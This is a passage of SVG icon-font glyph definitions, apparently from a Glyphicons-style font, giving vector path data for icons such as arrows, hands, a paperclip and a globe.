<glyph unicode="&#xe096;" d="M850 1200h300q21 0 35.5 -14.5t14.5 -35.5v-300q0 -21 -10.5 -25t-24.5 10l-94 94l-249 -249q-8 -7 -18 -7t-18 7l-106 106q-7 8 -7 18t7 18l249 249l-94 94q-14 14 -10 24.5t25 10.5zM350 0h-300q-21 0 -35.5 14.5t-14.5 35.5v300q0 21 10.5 25t24.5 -10l94 -94l249 249 q8 7 18 7t18 -7l106 -106q7 -8 7 -18t-7 -18l-249 -249l94 -94q14 -14 10 -24.5t-25 -10.5z" />
<glyph unicode="&#xe097;" d="M1014 1120l106 -106q7 -8 7 -18t-7 -18l-249 -249l94 -94q14 -14 10 -24.5t-25 -10.5h-300q-21 0 -35.5 14.5t-14.5 35.5v300q0 21 10.5 25t24.5 -10l94 -94l249 249q8 7 18 7t18 -7zM250 600h300q21 0 35.5 -14.5t14.5 -35.5v-300q0 -21 -10.5 -25t-24.5 10l-94 94 l-249 -249q-8 -7 -18 -7t-18 7l-106 106q-7 8 -7 18t7 18l249 249l-94 94q-14 14 -10 24.5t25 10.5z" />
<glyph unicode="&#xe101;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM704 900h-208q-20 0 -32 -14.5t-8 -34.5l58 -302q4 -20 21.5 -34.5 t37.5 -14.5h54q20 0 37.5 14.5t21.5 34.5l58 302q4 20 -8 34.5t-32 14.5zM675 400h-150q-10 0 -17.5 -7.5t-7.5 -17.5v-150q0 -10 7.5 -17.5t17.5 -7.5h150q10 0 17.5 7.5t7.5 17.5v150q0 10 -7.5 17.5t-17.5 7.5z" />
<glyph unicode="&#xe102;" d="M260 1200q9 0 19 -2t15 -4l5 -2q22 -10 44 -23l196 -118q21 -13 36 -24q29 -21 37 -12q11 13 49 35l196 118q22 13 45 23q17 7 38 7q23 0 47 -16.5t37 -33.5l13 -16q14 -21 18 -45l25 -123l8 -44q1 -9 8.5 -14.5t17.5 -5.5h61q10 0 17.5 -7.5t7.5 -17.5v-50 q0 -10 -7.5 -17.5t-17.5 -7.5h-50q-10 0 -17.5 -7.5t-7.5 -17.5v-175h-400v300h-200v-300h-400v175q0 10 -7.5 17.5t-17.5 7.5h-50q-10 0 -17.5 7.5t-7.5 17.5v50q0 10 7.5 17.5t17.5 7.5h61q11 0 18 3t7 8q0 4 9 52l25 128q5 25 19 45q2 3 5 7t13.5 15t21.5 19.5t26.5 15.5 t29.5 7zM915 1079l-166 -162q-7 -7 -5 -12t12 -5h219q10 0 15 7t2 17l-51 149q-3 10 -11 12t-15 -6zM463 917l-177 157q-8 7 -16 5t-11 -12l-51 -143q-3 -10 2 -17t15 -7h231q11 0 12.5 5t-5.5 12zM500 0h-375q-10 0 -17.5 7.5t-7.5 17.5v375h400v-400zM1100 400v-375 q0 -10 -7.5 -17.5t-17.5 -7.5h-375v400h400z" />
<glyph unicode="&#xe103;" d="M1165 1190q8 3 21 -6.5t13 -17.5q-2 -178 -24.5 -323.5t-55.5 -245.5t-87 -174.5t-102.5 -118.5t-118 -68.5t-118.5 -33t-120 -4.5t-105 9.5t-90 16.5q-61 12 -78 11q-4 1 -12.5 0t-34 -14.5t-52.5 -40.5l-153 -153q-26 -24 -37 -14.5t-11 43.5q0 64 42 102q8 8 50.5 45 t66.5 58q19 17 35 47t13 61q-9 55 -10 102.5t7 111t37 130t78 129.5q39 51 80 88t89.5 63.5t94.5 45t113.5 36t129 31t157.5 37t182 47.5zM1116 1098q-8 9 -22.5 -3t-45.5 -50q-38 -47 -119 -103.5t-142 -89.5l-62 -33q-56 -30 -102 -57t-104 -68t-102.5 -80.5t-85.5 -91 t-64 -104.5q-24 -56 -31 -86t2 -32t31.5 17.5t55.5 59.5q25 30 94 75.5t125.5 77.5t147.5 81q70 37 118.5 69t102 79.5t99 111t86.5 148.5q22 50 24 60t-6 19z" />
<glyph unicode="&#xe104;" d="M653 1231q-39 -67 -54.5 -131t-10.5 -114.5t24.5 -96.5t47.5 -80t63.5 -62.5t68.5 -46.5t65 -30q-4 7 -17.5 35t-18.5 39.5t-17 39.5t-17 43t-13 42t-9.5 44.5t-2 42t4 43t13.5 39t23 38.5q96 -42 165 -107.5t105 -138t52 -156t13 -159t-19 -149.5q-13 -55 -44 -106.5 t-68 -87t-78.5 -64.5t-72.5 -45t-53 -22q-72 -22 -127 -11q-31 6 -13 19q6 3 17 7q13 5 32.5 21t41 44t38.5 63.5t21.5 81.5t-6.5 94.5t-50 107t-104 115.5q10 -104 -0.5 -189t-37 -140.5t-65 -93t-84 -52t-93.5 -11t-95 24.5q-80 36 -131.5 114t-53.5 171q-2 23 0 49.5 t4.5 52.5t13.5 56t27.5 60t46 64.5t69.5 68.5q-8 -53 -5 -102.5t17.5 -90t34 -68.5t44.5 -39t49 -2q31 13 38.5 36t-4.5 55t-29 64.5t-36 75t-26 75.5q-15 85 2 161.5t53.5 128.5t85.5 92.5t93.5 61t81.5 25.5z" />
<glyph unicode="&#xe105;" d="M600 1094q82 0 160.5 -22.5t140 -59t116.5 -82.5t94.5 -95t68 -95t42.5 -82.5t14 -57.5t-14 -57.5t-43 -82.5t-68.5 -95t-94.5 -95t-116.5 -82.5t-140 -59t-159.5 -22.5t-159.5 22.5t-140 59t-116.5 82.5t-94.5 95t-68.5 95t-43 82.5t-14 57.5t14 57.5t42.5 82.5t68 95 t94.5 95t116.5 82.5t140 59t160.5 22.5zM888 829q-15 15 -18 12t5 -22q25 -57 25 -119q0 -124 -88 -212t-212 -88t-212 88t-88 212q0 59 23 114q8 19 4.5 22t-17.5 -12q-70 -69 -160 -184q-13 -16 -15 -40.5t9 -42.5q22 -36 47 -71t70 -82t92.5 -81t113 -58.5t133.5 -24.5 t133.5 24t113 58.5t92.5 81.5t70 81.5t47 70.5q11 18 9 42.5t-14 41.5q-90 117 -163 189zM448 727l-35 -36q-15 -15 -19.5 -38.5t4.5 -41.5q37 -68 93 -116q16 -13 38.5 -11t36.5 17l35 34q14 15 12.5 33.5t-16.5 33.5q-44 44 -89 117q-11 18 -28 20t-32 -12z" />
<glyph unicode="&#xe106;" d="M592 0h-148l31 120q-91 20 -175.5 68.5t-143.5 106.5t-103.5 119t-66.5 110t-22 76q0 21 14 57.5t42.5 82.5t68 95t94.5 95t116.5 82.5t140 59t160.5 22.5q61 0 126 -15l32 121h148zM944 770l47 181q108 -85 176.5 -192t68.5 -159q0 -26 -19.5 -71t-59.5 -102t-93 -112 t-129 -104.5t-158 -75.5l46 173q77 49 136 117t97 131q11 18 9 42.5t-14 41.5q-54 70 -107 130zM310 824q-70 -69 -160 -184q-13 -16 -15 -40.5t9 -42.5q18 -30 39 -60t57 -70.5t74 -73t90 -61t105 -41.5l41 154q-107 18 -178.5 101.5t-71.5 193.5q0 59 23 114q8 19 4.5 22 t-17.5 -12zM448 727l-35 -36q-15 -15 -19.5 -38.5t4.5 -41.5q37 -68 93 -116q16 -13 38.5 -11t36.5 17l12 11l22 86l-3 4q-44 44 -89 117q-11 18 -28 20t-32 -12z" />
<glyph unicode="&#xe107;" d="M-90 100l642 1066q20 31 48 28.5t48 -35.5l642 -1056q21 -32 7.5 -67.5t-50.5 -35.5h-1294q-37 0 -50.5 34t7.5 66zM155 200h345v75q0 10 7.5 17.5t17.5 7.5h150q10 0 17.5 -7.5t7.5 -17.5v-75h345l-445 723zM496 700h208q20 0 32 -14.5t8 -34.5l-58 -252 q-4 -20 -21.5 -34.5t-37.5 -14.5h-54q-20 0 -37.5 14.5t-21.5 34.5l-58 252q-4 20 8 34.5t32 14.5z" />
<glyph unicode="&#xe108;" d="M650 1200q62 0 106 -44t44 -106v-339l363 -325q15 -14 26 -38.5t11 -44.5v-41q0 -20 -12 -26.5t-29 5.5l-359 249v-263q100 -93 100 -113v-64q0 -21 -13 -29t-32 1l-205 128l-205 -128q-19 -9 -32 -1t-13 29v64q0 20 100 113v263l-359 -249q-17 -12 -29 -5.5t-12 26.5v41 q0 20 11 44.5t26 38.5l363 325v339q0 62 44 106t106 44z" />
<glyph unicode="&#xe109;" d="M850 1200h100q21 0 35.5 -14.5t14.5 -35.5v-50h50q21 0 35.5 -14.5t14.5 -35.5v-150h-1100v150q0 21 14.5 35.5t35.5 14.5h50v50q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-50h500v50q0 21 14.5 35.5t35.5 14.5zM1100 800v-750q0 -21 -14.5 -35.5 t-35.5 -14.5h-1000q-21 0 -35.5 14.5t-14.5 35.5v750h1100zM100 600v-100h100v100h-100zM300 600v-100h100v100h-100zM500 600v-100h100v100h-100zM700 600v-100h100v100h-100zM900 600v-100h100v100h-100zM100 400v-100h100v100h-100zM300 400v-100h100v100h-100zM500 400 v-100h100v100h-100zM700 400v-100h100v100h-100zM900 400v-100h100v100h-100zM100 200v-100h100v100h-100zM300 200v-100h100v100h-100zM500 200v-100h100v100h-100zM700 200v-100h100v100h-100zM900 200v-100h100v100h-100z" />
<glyph unicode="&#xe110;" d="M1135 1165l249 -230q15 -14 15 -35t-15 -35l-249 -230q-14 -14 -24.5 -10t-10.5 25v150h-159l-600 -600h-291q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h209l600 600h241v150q0 21 10.5 25t24.5 -10zM522 819l-141 -141l-122 122h-209q-21 0 -35.5 14.5 t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h291zM1135 565l249 -230q15 -14 15 -35t-15 -35l-249 -230q-14 -14 -24.5 -10t-10.5 25v150h-241l-181 181l141 141l122 -122h159v150q0 21 10.5 25t24.5 -10z" />
<glyph unicode="&#xe111;" d="M100 1100h1000q41 0 70.5 -29.5t29.5 -70.5v-600q0 -41 -29.5 -70.5t-70.5 -29.5h-596l-304 -300v300h-100q-41 0 -70.5 29.5t-29.5 70.5v600q0 41 29.5 70.5t70.5 29.5z" />
<glyph unicode="&#xe112;" d="M150 1200h200q21 0 35.5 -14.5t14.5 -35.5v-250h-300v250q0 21 14.5 35.5t35.5 14.5zM850 1200h200q21 0 35.5 -14.5t14.5 -35.5v-250h-300v250q0 21 14.5 35.5t35.5 14.5zM1100 800v-300q0 -41 -3 -77.5t-15 -89.5t-32 -96t-58 -89t-89 -77t-129 -51t-174 -20t-174 20 t-129 51t-89 77t-58 89t-32 96t-15 89.5t-3 77.5v300h300v-250v-27v-42.5t1.5 -41t5 -38t10 -35t16.5 -30t25.5 -24.5t35 -19t46.5 -12t60 -4t60 4.5t46.5 12.5t35 19.5t25 25.5t17 30.5t10 35t5 38t2 40.5t-0.5 42v25v250h300z" />
<glyph unicode="&#xe113;" d="M1100 411l-198 -199l-353 353l-353 -353l-197 199l551 551z" />
<glyph unicode="&#xe114;" d="M1101 789l-550 -551l-551 551l198 199l353 -353l353 353z" />
<glyph unicode="&#xe115;" d="M404 1000h746q21 0 35.5 -14.5t14.5 -35.5v-551h150q21 0 25 -10.5t-10 -24.5l-230 -249q-14 -15 -35 -15t-35 15l-230 249q-14 14 -10 24.5t25 10.5h150v401h-381zM135 984l230 -249q14 -14 10 -24.5t-25 -10.5h-150v-400h385l215 -200h-750q-21 0 -35.5 14.5 t-14.5 35.5v550h-150q-21 0 -25 10.5t10 24.5l230 249q14 15 35 15t35 -15z" />
<glyph unicode="&#xe116;" d="M56 1200h94q17 0 31 -11t18 -27l38 -162h896q24 0 39 -18.5t10 -42.5l-100 -475q-5 -21 -27 -42.5t-55 -21.5h-633l48 -200h535q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-50v-50q0 -21 -14.5 -35.5t-35.5 -14.5t-35.5 14.5t-14.5 35.5v50h-300v-50 q0 -21 -14.5 -35.5t-35.5 -14.5t-35.5 14.5t-14.5 35.5v50h-31q-18 0 -32.5 10t-20.5 19l-5 10l-201 961h-54q-20 0 -35 14.5t-15 35.5t15 35.5t35 14.5z" />
<glyph unicode="&#xe117;" d="M1200 1000v-100h-1200v100h200q0 41 29.5 70.5t70.5 29.5h300q41 0 70.5 -29.5t29.5 -70.5h500zM0 800h1200v-800h-1200v800z" />
<glyph unicode="&#xe118;" d="M200 800l-200 -400v600h200q0 41 29.5 70.5t70.5 29.5h300q42 0 71 -29.5t29 -70.5h500v-200h-1000zM1500 700l-300 -700h-1200l300 700h1200z" />
<glyph unicode="&#xe119;" d="M635 1184l230 -249q14 -14 10 -24.5t-25 -10.5h-150v-601h150q21 0 25 -10.5t-10 -24.5l-230 -249q-14 -15 -35 -15t-35 15l-230 249q-14 14 -10 24.5t25 10.5h150v601h-150q-21 0 -25 10.5t10 24.5l230 249q14 15 35 15t35 -15z" />
<glyph unicode="&#xe120;" d="M936 864l249 -229q14 -15 14 -35.5t-14 -35.5l-249 -229q-15 -15 -25.5 -10.5t-10.5 24.5v151h-600v-151q0 -20 -10.5 -24.5t-25.5 10.5l-249 229q-14 15 -14 35.5t14 35.5l249 229q15 15 25.5 10.5t10.5 -25.5v-149h600v149q0 21 10.5 25.5t25.5 -10.5z" />
<glyph unicode="&#xe121;" d="M1169 400l-172 732q-5 23 -23 45.5t-38 22.5h-672q-20 0 -38 -20t-23 -41l-172 -739h1138zM1100 300h-1000q-41 0 -70.5 -29.5t-29.5 -70.5v-100q0 -41 29.5 -70.5t70.5 -29.5h1000q41 0 70.5 29.5t29.5 70.5v100q0 41 -29.5 70.5t-70.5 29.5zM800 100v100h100v-100h-100 zM1000 100v100h100v-100h-100z" />
<glyph unicode="&#xe122;" d="M1150 1100q21 0 35.5 -14.5t14.5 -35.5v-850q0 -21 -14.5 -35.5t-35.5 -14.5t-35.5 14.5t-14.5 35.5v850q0 21 14.5 35.5t35.5 14.5zM1000 200l-675 200h-38l47 -276q3 -16 -5.5 -20t-29.5 -4h-7h-84q-20 0 -34.5 14t-18.5 35q-55 337 -55 351v250v6q0 16 1 23.5t6.5 14 t17.5 6.5h200l675 250v-850zM0 750v-250q-4 0 -11 0.5t-24 6t-30 15t-24 30t-11 48.5v50q0 26 10.5 46t25 30t29 16t25.5 7z" />
<glyph unicode="&#xe123;" d="M553 1200h94q20 0 29 -10.5t3 -29.5l-18 -37q83 -19 144 -82.5t76 -140.5l63 -327l118 -173h17q19 0 33 -14.5t14 -35t-13 -40.5t-31 -27q-8 -4 -23 -9.5t-65 -19.5t-103 -25t-132.5 -20t-158.5 -9q-57 0 -115 5t-104 12t-88.5 15.5t-73.5 17.5t-54.5 16t-35.5 12l-11 4 q-18 8 -31 28t-13 40.5t14 35t33 14.5h17l118 173l63 327q15 77 76 140t144 83l-18 32q-6 19 3.5 32t28.5 13zM498 110q50 -6 102 -6q53 0 102 6q-12 -49 -39.5 -79.5t-62.5 -30.5t-63 30.5t-39 79.5z" />
<glyph unicode="&#xe124;" d="M800 946l224 78l-78 -224l234 -45l-180 -155l180 -155l-234 -45l78 -224l-224 78l-45 -234l-155 180l-155 -180l-45 234l-224 -78l78 224l-234 45l180 155l-180 155l234 45l-78 224l224 -78l45 234l155 -180l155 180z" />
<glyph unicode="&#xe125;" d="M650 1200h50q40 0 70 -40.5t30 -84.5v-150l-28 -125h328q40 0 70 -40.5t30 -84.5v-100q0 -45 -29 -74l-238 -344q-16 -24 -38 -40.5t-45 -16.5h-250q-7 0 -42 25t-66 50l-31 25h-61q-45 0 -72.5 18t-27.5 57v400q0 36 20 63l145 196l96 198q13 28 37.5 48t51.5 20z M650 1100l-100 -212l-150 -213v-375h100l136 -100h214l250 375v125h-450l50 225v175h-50zM50 800h100q21 0 35.5 -14.5t14.5 -35.5v-500q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v500q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe126;" d="M600 1100h250q23 0 45 -16.5t38 -40.5l238 -344q29 -29 29 -74v-100q0 -44 -30 -84.5t-70 -40.5h-328q28 -118 28 -125v-150q0 -44 -30 -84.5t-70 -40.5h-50q-27 0 -51.5 20t-37.5 48l-96 198l-145 196q-20 27 -20 63v400q0 39 27.5 57t72.5 18h61q124 100 139 100z M50 1000h100q21 0 35.5 -14.5t14.5 -35.5v-500q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v500q0 21 14.5 35.5t35.5 14.5zM636 1000l-136 -100h-100v-375l150 -213l100 -212h50v175l-50 225h450v125l-250 375h-214z" />
<glyph unicode="&#xe127;" d="M356 873l363 230q31 16 53 -6l110 -112q13 -13 13.5 -32t-11.5 -34l-84 -121h302q84 0 138 -38t54 -110t-55 -111t-139 -39h-106l-131 -339q-6 -21 -19.5 -41t-28.5 -20h-342q-7 0 -90 81t-83 94v525q0 17 14 35.5t28 28.5zM400 792v-503l100 -89h293l131 339 q6 21 19.5 41t28.5 20h203q21 0 30.5 25t0.5 50t-31 25h-456h-7h-6h-5.5t-6 0.5t-5 1.5t-5 2t-4 2.5t-4 4t-2.5 4.5q-12 25 5 47l146 183l-86 83zM50 800h100q21 0 35.5 -14.5t14.5 -35.5v-500q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v500 q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe128;" d="M475 1103l366 -230q2 -1 6 -3.5t14 -10.5t18 -16.5t14.5 -20t6.5 -22.5v-525q0 -13 -86 -94t-93 -81h-342q-15 0 -28.5 20t-19.5 41l-131 339h-106q-85 0 -139.5 39t-54.5 111t54 110t138 38h302l-85 121q-11 15 -10.5 34t13.5 32l110 112q22 22 53 6zM370 945l146 -183 q17 -22 5 -47q-2 -2 -3.5 -4.5t-4 -4t-4 -2.5t-5 -2t-5 -1.5t-6 -0.5h-6h-6.5h-6h-475v-100h221q15 0 29 -20t20 -41l130 -339h294l106 89v503l-342 236zM1050 800h100q21 0 35.5 -14.5t14.5 -35.5v-500q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5 v500q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe129;" d="M550 1294q72 0 111 -55t39 -139v-106l339 -131q21 -6 41 -19.5t20 -28.5v-342q0 -7 -81 -90t-94 -83h-525q-17 0 -35.5 14t-28.5 28l-9 14l-230 363q-16 31 6 53l112 110q13 13 32 13.5t34 -11.5l121 -84v302q0 84 38 138t110 54zM600 972v203q0 21 -25 30.5t-50 0.5 t-25 -31v-456v-7v-6v-5.5t-0.5 -6t-1.5 -5t-2 -5t-2.5 -4t-4 -4t-4.5 -2.5q-25 -12 -47 5l-183 146l-83 -86l236 -339h503l89 100v293l-339 131q-21 6 -41 19.5t-20 28.5zM450 200h500q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-500 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe130;" d="M350 1100h500q21 0 35.5 14.5t14.5 35.5v100q0 21 -14.5 35.5t-35.5 14.5h-500q-21 0 -35.5 -14.5t-14.5 -35.5v-100q0 -21 14.5 -35.5t35.5 -14.5zM600 306v-106q0 -84 -39 -139t-111 -55t-110 54t-38 138v302l-121 -84q-15 -12 -34 -11.5t-32 13.5l-112 110 q-22 22 -6 53l230 363q1 2 3.5 6t10.5 13.5t16.5 17t20 13.5t22.5 6h525q13 0 94 -83t81 -90v-342q0 -15 -20 -28.5t-41 -19.5zM308 900l-236 -339l83 -86l183 146q22 17 47 5q2 -1 4.5 -2.5t4 -4t2.5 -4t2 -5t1.5 -5t0.5 -6v-5.5v-6v-7v-456q0 -22 25 -31t50 0.5t25 30.5 v203q0 15 20 28.5t41 19.5l339 131v293l-89 100h-503z" />
<glyph unicode="&#xe131;" d="M600 1178q118 0 225 -45.5t184.5 -123t123 -184.5t45.5 -225t-45.5 -225t-123 -184.5t-184.5 -123t-225 -45.5t-225 45.5t-184.5 123t-123 184.5t-45.5 225t45.5 225t123 184.5t184.5 123t225 45.5zM914 632l-275 223q-16 13 -27.5 8t-11.5 -26v-137h-275 q-10 0 -17.5 -7.5t-7.5 -17.5v-150q0 -10 7.5 -17.5t17.5 -7.5h275v-137q0 -21 11.5 -26t27.5 8l275 223q16 13 16 32t-16 32z" />
<glyph unicode="&#xe132;" d="M600 1178q118 0 225 -45.5t184.5 -123t123 -184.5t45.5 -225t-45.5 -225t-123 -184.5t-184.5 -123t-225 -45.5t-225 45.5t-184.5 123t-123 184.5t-45.5 225t45.5 225t123 184.5t184.5 123t225 45.5zM561 855l-275 -223q-16 -13 -16 -32t16 -32l275 -223q16 -13 27.5 -8 t11.5 26v137h275q10 0 17.5 7.5t7.5 17.5v150q0 10 -7.5 17.5t-17.5 7.5h-275v137q0 21 -11.5 26t-27.5 -8z" />
<glyph unicode="&#xe133;" d="M600 1178q118 0 225 -45.5t184.5 -123t123 -184.5t45.5 -225t-45.5 -225t-123 -184.5t-184.5 -123t-225 -45.5t-225 45.5t-184.5 123t-123 184.5t-45.5 225t45.5 225t123 184.5t184.5 123t225 45.5zM855 639l-223 275q-13 16 -32 16t-32 -16l-223 -275q-13 -16 -8 -27.5 t26 -11.5h137v-275q0 -10 7.5 -17.5t17.5 -7.5h150q10 0 17.5 7.5t7.5 17.5v275h137q21 0 26 11.5t-8 27.5z" />
<glyph unicode="&#xe134;" d="M600 1178q118 0 225 -45.5t184.5 -123t123 -184.5t45.5 -225t-45.5 -225t-123 -184.5t-184.5 -123t-225 -45.5t-225 45.5t-184.5 123t-123 184.5t-45.5 225t45.5 225t123 184.5t184.5 123t225 45.5zM675 900h-150q-10 0 -17.5 -7.5t-7.5 -17.5v-275h-137q-21 0 -26 -11.5 t8 -27.5l223 -275q13 -16 32 -16t32 16l223 275q13 16 8 27.5t-26 11.5h-137v275q0 10 -7.5 17.5t-17.5 7.5z" />
<glyph unicode="&#xe135;" d="M600 1176q116 0 222.5 -46t184 -123.5t123.5 -184t46 -222.5t-46 -222.5t-123.5 -184t-184 -123.5t-222.5 -46t-222.5 46t-184 123.5t-123.5 184t-46 222.5t46 222.5t123.5 184t184 123.5t222.5 46zM627 1101q-15 -12 -36.5 -20.5t-35.5 -12t-43 -8t-39 -6.5 q-15 -3 -45.5 0t-45.5 -2q-20 -7 -51.5 -26.5t-34.5 -34.5q-3 -11 6.5 -22.5t8.5 -18.5q-3 -34 -27.5 -91t-29.5 -79q-9 -34 5 -93t8 -87q0 -9 17 -44.5t16 -59.5q12 0 23 -5t23.5 -15t19.5 -14q16 -8 33 -15t40.5 -15t34.5 -12q21 -9 52.5 -32t60 -38t57.5 -11 q7 -15 -3 -34t-22.5 -40t-9.5 -38q13 -21 23 -34.5t27.5 -27.5t36.5 -18q0 -7 -3.5 -16t-3.5 -14t5 -17q104 -2 221 112q30 29 46.5 47t34.5 49t21 63q-13 8 -37 8.5t-36 7.5q-15 7 -49.5 15t-51.5 19q-18 0 -41 -0.5t-43 -1.5t-42 -6.5t-38 -16.5q-51 -35 -66 -12 q-4 1 -3.5 25.5t0.5 25.5q-6 13 -26.5 17.5t-24.5 6.5q1 15 -0.5 30.5t-7 28t-18.5 11.5t-31 -21q-23 -25 -42 4q-19 28 -8 58q6 16 22 22q6 -1 26 -1.5t33.5 -4t19.5 -13.5q7 -12 18 -24t21.5 -20.5t20 -15t15.5 -10.5l5 -3q2 12 7.5 30.5t8 34.5t-0.5 32q-3 18 3.5 29 t18 22.5t15.5 24.5q6 14 10.5 35t8 31t15.5 22.5t34 22.5q-6 18 10 36q8 0 24 -1.5t24.5 -1.5t20 4.5t20.5 15.5q-10 23 -31 42.5t-37.5 29.5t-49 27t-43.5 23q0 1 2 8t3 11.5t1.5 10.5t-1 9.5t-4.5 4.5q31 -13 58.5 -14.5t38.5 2.5l12 5q5 28 -9.5 46t-36.5 24t-50 15 t-41 20q-18 -4 -37 0zM613 994q0 -17 8 -42t17 -45t9 -23q-8 1 -39.5 5.5t-52.5 10t-37 16.5q3 11 16 29.5t16 25.5q10 -10 19 -10t14 6t13.5 14.5t16.5 12.5z" />
<glyph unicode="&#xe136;" d="M756 1157q164 92 306 -9l-259 -138l145 -232l251 126q6 -89 -34 -156.5t-117 -110.5q-60 -34 -127 -39.5t-126 16.5l-596 -596q-15 -16 -36.5 -16t-36.5 16l-111 110q-15 15 -15 36.5t15 37.5l600 599q-34 101 5.5 201.5t135.5 154.5z" />
<glyph unicode="&#xe137;" horiz-adv-x="1220" d="M100 1196h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5v100q0 41 29.5 70.5t70.5 29.5zM1100 1096h-200v-100h200v100zM100 796h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000 q-41 0 -70.5 29.5t-29.5 70.5v100q0 41 29.5 70.5t70.5 29.5zM1100 696h-500v-100h500v100zM100 396h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5v100q0 41 29.5 70.5t70.5 29.5zM1100 296h-300v-100h300v100z " />
<glyph unicode="&#xe138;" d="M150 1200h900q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-900q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM700 500v-300l-200 -200v500l-350 500h900z" />
<glyph unicode="&#xe139;" d="M500 1200h200q41 0 70.5 -29.5t29.5 -70.5v-100h300q41 0 70.5 -29.5t29.5 -70.5v-400h-500v100h-200v-100h-500v400q0 41 29.5 70.5t70.5 29.5h300v100q0 41 29.5 70.5t70.5 29.5zM500 1100v-100h200v100h-200zM1200 400v-200q0 -41 -29.5 -70.5t-70.5 -29.5h-1000 q-41 0 -70.5 29.5t-29.5 70.5v200h1200z" />
<glyph unicode="&#xe140;" d="M50 1200h300q21 0 25 -10.5t-10 -24.5l-94 -94l199 -199q7 -8 7 -18t-7 -18l-106 -106q-8 -7 -18 -7t-18 7l-199 199l-94 -94q-14 -14 -24.5 -10t-10.5 25v300q0 21 14.5 35.5t35.5 14.5zM850 1200h300q21 0 35.5 -14.5t14.5 -35.5v-300q0 -21 -10.5 -25t-24.5 10l-94 94 l-199 -199q-8 -7 -18 -7t-18 7l-106 106q-7 8 -7 18t7 18l199 199l-94 94q-14 14 -10 24.5t25 10.5zM364 470l106 -106q7 -8 7 -18t-7 -18l-199 -199l94 -94q14 -14 10 -24.5t-25 -10.5h-300q-21 0 -35.5 14.5t-14.5 35.5v300q0 21 10.5 25t24.5 -10l94 -94l199 199 q8 7 18 7t18 -7zM1071 271l94 94q14 14 24.5 10t10.5 -25v-300q0 -21 -14.5 -35.5t-35.5 -14.5h-300q-21 0 -25 10.5t10 24.5l94 94l-199 199q-7 8 -7 18t7 18l106 106q8 7 18 7t18 -7z" />
<glyph unicode="&#xe141;" d="M596 1192q121 0 231.5 -47.5t190 -127t127 -190t47.5 -231.5t-47.5 -231.5t-127 -190.5t-190 -127t-231.5 -47t-231.5 47t-190.5 127t-127 190.5t-47 231.5t47 231.5t127 190t190.5 127t231.5 47.5zM596 1010q-112 0 -207.5 -55.5t-151 -151t-55.5 -207.5t55.5 -207.5 t151 -151t207.5 -55.5t207.5 55.5t151 151t55.5 207.5t-55.5 207.5t-151 151t-207.5 55.5zM454.5 905q22.5 0 38.5 -16t16 -38.5t-16 -39t-38.5 -16.5t-38.5 16.5t-16 39t16 38.5t38.5 16zM754.5 905q22.5 0 38.5 -16t16 -38.5t-16 -39t-38 -16.5q-14 0 -29 10l-55 -145 q17 -23 17 -51q0 -36 -25.5 -61.5t-61.5 -25.5t-61.5 25.5t-25.5 61.5q0 32 20.5 56.5t51.5 29.5l122 126l1 1q-9 14 -9 28q0 23 16 39t38.5 16zM345.5 709q22.5 0 38.5 -16t16 -38.5t-16 -38.5t-38.5 -16t-38.5 16t-16 38.5t16 38.5t38.5 16zM854.5 709q22.5 0 38.5 -16 t16 -38.5t-16 -38.5t-38.5 -16t-38.5 16t-16 38.5t16 38.5t38.5 16z" />
<glyph unicode="&#xe142;" d="M546 173l469 470q91 91 99 192q7 98 -52 175.5t-154 94.5q-22 4 -47 4q-34 0 -66.5 -10t-56.5 -23t-55.5 -38t-48 -41.5t-48.5 -47.5q-376 -375 -391 -390q-30 -27 -45 -41.5t-37.5 -41t-32 -46.5t-16 -47.5t-1.5 -56.5q9 -62 53.5 -95t99.5 -33q74 0 125 51l548 548 q36 36 20 75q-7 16 -21.5 26t-32.5 10q-26 0 -50 -23q-13 -12 -39 -38l-341 -338q-15 -15 -35.5 -15.5t-34.5 13.5t-14 34.5t14 34.5q327 333 361 367q35 35 67.5 51.5t78.5 16.5q14 0 29 -1q44 -8 74.5 -35.5t43.5 -68.5q14 -47 2 -96.5t-47 -84.5q-12 -11 -32 -32 t-79.5 -81t-114.5 -115t-124.5 -123.5t-123 -119.5t-96.5 -89t-57 -45q-56 -27 -120 -27q-70 0 -129 32t-93 89q-48 78 -35 173t81 163l511 511q71 72 111 96q91 55 198 55q80 0 152 -33q78 -36 129.5 -103t66.5 -154q17 -93 -11 -183.5t-94 -156.5l-482 -476 q-15 -15 -36 -16t-37 14t-17.5 34t14.5 35z" />
